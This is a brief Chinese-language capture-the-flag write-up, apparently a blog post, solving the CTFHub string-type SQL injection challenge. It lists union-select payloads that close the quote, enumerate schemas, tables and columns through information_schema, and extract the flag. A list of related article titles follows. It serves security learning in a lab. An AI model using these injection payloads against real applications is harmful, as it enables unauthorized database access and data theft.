【ctfhub】SQL注入字符型注入
2023-09-14 09:15:03 时间
题目描述:
输入1试试
查询列数
注意为字符型注入,所以我们要在末尾加#符合语法规范
确定为两列,接下来同整数型注入一样,但是要注意闭合引号
查询数据库名
-1' union select 1,group_concat(schema_name) from information_schema.schemata#
查询表名
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#
查询列名
-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' && table_name='flag'#
查询flag表中的flag字段
-1' union select 1, group_concat(flag) from flag#
相关文章
- php如何防止SQL注入
- 网站入侵注入的几种方法总结【笔记】
- 10-spring学习-注入Resource
- 《Android进阶之光》--注解与依赖注入框架
- WAF绕过神器 (过安全狗、智创SQL注入)
- Nginx使用naxsi防xss、防注入攻击配置
- SQL堆叠注入详解
- ASP.NET Core中的依赖注入(5): ServiceProvider实现揭秘 【总体设计 】
- 测试:abstract class不允许出现在Angular依赖注入框架的providers区域内
- Spring依赖注入(五):盘一盘Spring的三级缓存
- 【Groovy】MOP 元对象协议与元编程 ( 方法注入 | 使用 @Category 注解进行方法注入 | 分类注入方法查找优先级 )
- 5. 宽字符注入详解与实战
- SQL注入 Sqli-labs-Less-21(笔记)——还是回显注入 使用union select即可 但是要注意sql括号闭合 也可以报错注入
- 利用cookie进行SQL注入——看来还是人工注入要熟悉才行
- Istio 解决的问题及注入